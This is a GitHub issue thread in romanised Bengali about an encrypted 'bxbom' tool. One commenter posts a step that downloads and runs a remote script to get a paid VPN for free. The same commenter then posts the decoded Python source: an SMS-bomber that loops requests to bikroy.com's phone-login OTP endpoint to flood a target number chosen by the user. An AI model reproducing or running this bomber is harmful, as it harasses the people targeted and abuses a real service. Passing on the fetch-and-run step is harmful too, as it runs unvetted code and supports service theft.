### ISSUE TITLE
!! EXCLUSE ME !!

### ISSUE THREAD

**Issue by ghost** [tuntunihaxor/bxbom#1]
vai kiptami na kore code ta open source korle hoe na? amadero sikhar sujok kore den..

**Comment by tuntunihaxor** [comment]
Vaiya kiptami koi korlam

**Comment by ghost** [comment]
@tuntunihaxor vai apnar code ta kivabe kaj kore seita bolle valo hoito. apnar code ta toh hash format e kora

**Comment by tuntunihaxor** [comment]
Ha code encrypt kora .. asole nijer banano to tai encrypt kore rakhtei
hy... Sbai e to emn korei dey vai

**Comment by ghost** [comment]
@tuntunihaxor vai please apnar code ta ki amk email kore pathaben please. email: rashedrafi145@gmail.com
btw, amr repo te free te paid vpn(1.1.1.1 er warp+) neoar code ase seita use korte paren. apnar kaje lagbe.
$ curl -LO https://raw.githubusercontent.com/rashed145/myTermux/master/wp
$ bash wp
# erpor apnar 1.1.1.1 id diben r koto gb niben ta diben

**Comment by tuntunihaxor** [comment]
Amar lage na eta vaiya... Amr sky vpn ase

**Comment by ghost** [comment]
@tuntunihaxor thik ase vaiya. apnar code ta dile upokrito hoitam..

**Comment by tuntunihaxor** [comment]
Code decrypt kore ?

**Comment by ghost** [comment]
@tuntunihaxor ba kivabe sikhlen seita bolle valo hoito vaiya

**Comment by ghost** [comment]
@tuntunihaxor ha

**Comment by tuntunihaxor** [comment]
Tahole amr eto kosto kore code banaya ki holo vaiya... Post disi to
trickbd.com a , dekhe banan

**Comment by ghost** [comment]
@tuntunihaxor post tar link arektu kosto kore den na vaiya

**Comment by tuntunihaxor** [comment]
Kon post?

**Comment by tuntunihaxor** [comment]
Vaiya amk olpo kidu tk tk pay korle ami decrypt kore dite pari

**Comment by ghost** [comment]
ei code er jonno taka chaitesen?

import os

try:                                       import requests                        import pyfiglet                    
except:                                    os.system("pip install pyfiglet")
    os.system("pip install requests")  
import pyfiglet as pyg
import requests
from requests.structures import CaseInsensitiveDict
                                       biblack="\\033[1;90m"      # Black
bired="\\033[1;91m"        # Red
bigreen="\\033[1;92m"      # Green
biyellow="\\033[1;93m"     # Yellow
biblue="\\033[1;94m"       # Blue
bipurple="\\033[1;95m"     # Purple
bicyan="\\033[1;96m"       # Cyan
biehite="\\033[1;97m"      # White

os.system("clear")

slogan2="""
\\t\\t.................LOVE MEANS PAIN...................\

\\t\\t   ........SHE HAS BEEN  BROKEN MY HEART.........\
"""



print(bigreen+"\
\\t\\t      ......Welcome To Tuntuni`s World........\
\
")
print(pyg.figlet_format(\'TUNTUNI  HAXOR\',justify="center",font="standard"))
print(slogan2)

name=str(input("\
Who Broken Your Heart:-"))
print(name+ " Is Very Selfish....\
")
number=str(input("\
Give Me His/Her Number:- "))
amount=int(input("\
How Much You Cried For Her:- "))

url = "https://bikroy.com/data/phone_number_login/verifications/phone_login?phone="+number

headers = CaseInsensitiveDict()
headers["Host"] = "bikroy.com"
headers["accept"] = "application/json, text/plain, */*"
headers["accept-language"] = "bn"
headers["user-agent"] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36"
headers["application-name"] = "web"
headers["x-requested-with"] = "mark.via.gp"
headers["sec-fetch-site"] = "same-origin"
headers["sec-fetch-mode"] = "cors"
headers["sec-fetch-dest"] = "empty"
headers["referer"] = "https://bikroy.com/bn/users/login?action=login&stack=webapp&redirect-url=/bn/users/login-options"
headers["accept-encoding"] = "gzip, deflate"
headers["cookie"] = "ab-test.pwa-only=reactapp"

for i in range(amount):
  resp = requests.get(url, headers=headers)
  print(str(i+1)+"  Kicked..Don\'t Cry.. Stay With Me\
")

**Comment by tuntunihaxor** [comment]
Decode kore nisen? Onner code copy kora ta kintu thik na bro
